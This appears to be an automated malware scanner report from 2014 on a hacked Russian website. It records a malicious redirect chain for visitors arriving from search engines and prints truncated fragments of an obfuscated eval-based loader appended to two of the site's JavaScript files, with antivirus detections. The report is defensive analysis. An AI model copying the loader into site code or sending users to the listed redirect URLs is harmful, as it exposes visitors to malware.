Malware Scanner report for stv-preobragen.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors arriving from search engines to a third-party URL. The chain of malicious redirects found:
->http://tinyurl.com/clobphp
216 websites infected.
->http://vrd-renkum.nl/templates/css/css/www/4.php
318 websites infected.

The website "stv-preobragen.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Malicious/Suspicious Redirects

Request | Server response | Status

URL: http://stv-preobragen.ru/
(imitation of visitor from search engine)

Request:
GET / HTTP/1.1
Host: stv-preobragen.ru
Referer: http://www.google.com/search?q=redirect+check1

Response:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 04 May 2014 00:14:05 GMT
Location: http://tinyurl.com/clobphp
Server: nginx/1.4.1
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17

Status: malicious

URL: http://tinyurl.com/clobphp
(imitation of visitor from search engine)

Request:
GET /clobphp HTTP/1.1
Host: tinyurl.com
Referer: http://www.google.com/search?q=redirect+check2

Response:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 04 May 2014 00:14:05 GMT
Location: http://vrd-renkum.nl/templates/css/css/www/4.php
Server: TinyURL/1.6
Content-Length: 0
Content-Type: text/html
Set-Cookie: tinyUUID=3658652bff514e9e0be20000; expires=Mon, 04-May-2015 00:14:05 GMT; path=/; domain=.tinyurl.com
X-Powered-By: PHP/5.4.27
X-Tiny: cache 0.010457038879395

Status: malicious

Scanned pages/files

Request | Server response | Status
http://stv-preobragen.ru/
200 OK
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js
200 OK
Content-Length: 16782
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


var DD_belatedPNG={ns:"DD_belatedPNG",imgSize:{},delay:10,nodesFixed:0,createVmlNameSpace:function(){if(document.namespaces&&!document.namespaces[this.ns]){document.namespaces.add(this.ns,"urn:schemas-microsoft-com:vml")}},createVmlStyleSheet:function(){var b,a;b=document.createElement("style");b.setAttribute("media","screen");document.documentElement.firstChild.insertBefore(b,document.documentElement.firstChild.firstChild);if(b.styleSheet){b=b.styleSheet;b.addRule(this.ns+"\\:*","
... 15375 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

AntiVir: JS/Agent.CB.5
Avast: JS:Redirector-AKA [Trj]
Ad-Aware: Trojan.JS.Redirector.BOQ
Ikarus: Trojan.JS.Redirector
Rising: JS:Malware.JCrypto!1.9BF9
nProtect: Trojan.JS.Redirector.BOQ
K7AntiVirus: Trojan ( 91ee82b70 )
Emsisoft: Trojan.JS.Redirector.BOQ (B)
Comodo: TrojWare.JS.Agent.TC
K7GW: Exploit ( 04c553061 )
DrWeb: JS.Redirector.188
Microsoft: Trojan:JS/Redirector.MK
Kaspersky: Trojan.JS.Redirector.zb
MicroWorld-eScan: Trojan.JS.Redirector.BOQ
Fortinet: JS/Redirector.NJI!tr
NANO-Antivirus: Trojan.Script.Redirector.bqiube
F-Secure: Trojan.JS.Redirector.BOQ
VIPRE: Trojan.JS.Redirector.mk (v)
F-Prot: JS/Redir.SA
AVG: HTML/Framer
Norman: Redirector.JF
GData: Trojan.JS.Redirector.BOQ
Commtouch: JS/Redir.SA
ESET-NOD32: JS/Redirector.NJG
BitDefender: Trojan.JS.Redirector.BOQ

http://stv-preobragen.ru/assets/templates/stav-preobragen/javascript/site.js
200 OK
Content-Length: 11313
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getbg() {
var rootContentElement = document.getElementById("page-content");
var div = rootContentElement.getElementsByTagName("div")[0];
var scripts = rootContentElement.getElementsByTagName("script")[0];

var parentElements = rootContentElement.getElementsByTagName("*");

console.log();
if(typeof div == "undefined" || parentElements[0].tagName !== "div") {
rootContentElement.style.backgroundColor = '#FBB03B';
}
... 10526 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

AntiVir: JS/Agent.CB.5
Avast: JS:Redirector-AKA [Trj]
Ad-Aware: Trojan.JS.Agent.JAB
Ikarus: Trojan.JS.Redirector
Rising: JS:Malware.JCrypto!1.9BF9
nProtect: Trojan.JS.Agent.JAB
K7AntiVirus: Trojan ( 91ee82b70 )
Emsisoft: Trojan.JS.Agent.JAB (B)
Comodo: TrojWare.JS.Agent.TC
K7GW: Exploit ( 04c553061 )
DrWeb: JS.Redirector.188
Microsoft: Trojan:JS/Redirector.MK
Kaspersky: Trojan.JS.Redirector.zb
MicroWorld-eScan: Trojan.JS.Agent.JAB
Fortinet: JS/Redirector.NJI!tr
NANO-Antivirus: Trojan.Script.Redirector.bqiube
F-Secure: Trojan.JS.Agent.JAB
VIPRE: Trojan.JS.Redirector.mk (v)
F-Prot: JS/Redir.SA
AVG: HTML/Framer
Norman: ShellCode.V
GData: Trojan.JS.Agent.JAB
Commtouch: JS/Redir.SA
ESET-NOD32: JS/Redirector.NJG
BitDefender: Trojan.JS.Agent.JAB

http://stv-preobragen.ru//yandex.st/share/share.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ ...78 symbols skipped
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ ...139 symbols skipped
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ ...200 symbols skipped
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ ...261 symbols skipped
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean
http://stv-preobragen.ru//yandex.st/share/share.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/DD_belatedPNG.js/assets/templates/stav-preobragen/javascript/ ...322 symbols skipped
404 Not Found
Content-Length: 12401
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=stv-preobragen.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://stv-preobragen.ru/

Result: stv-preobragen.ru is not infected or malware details are not published yet.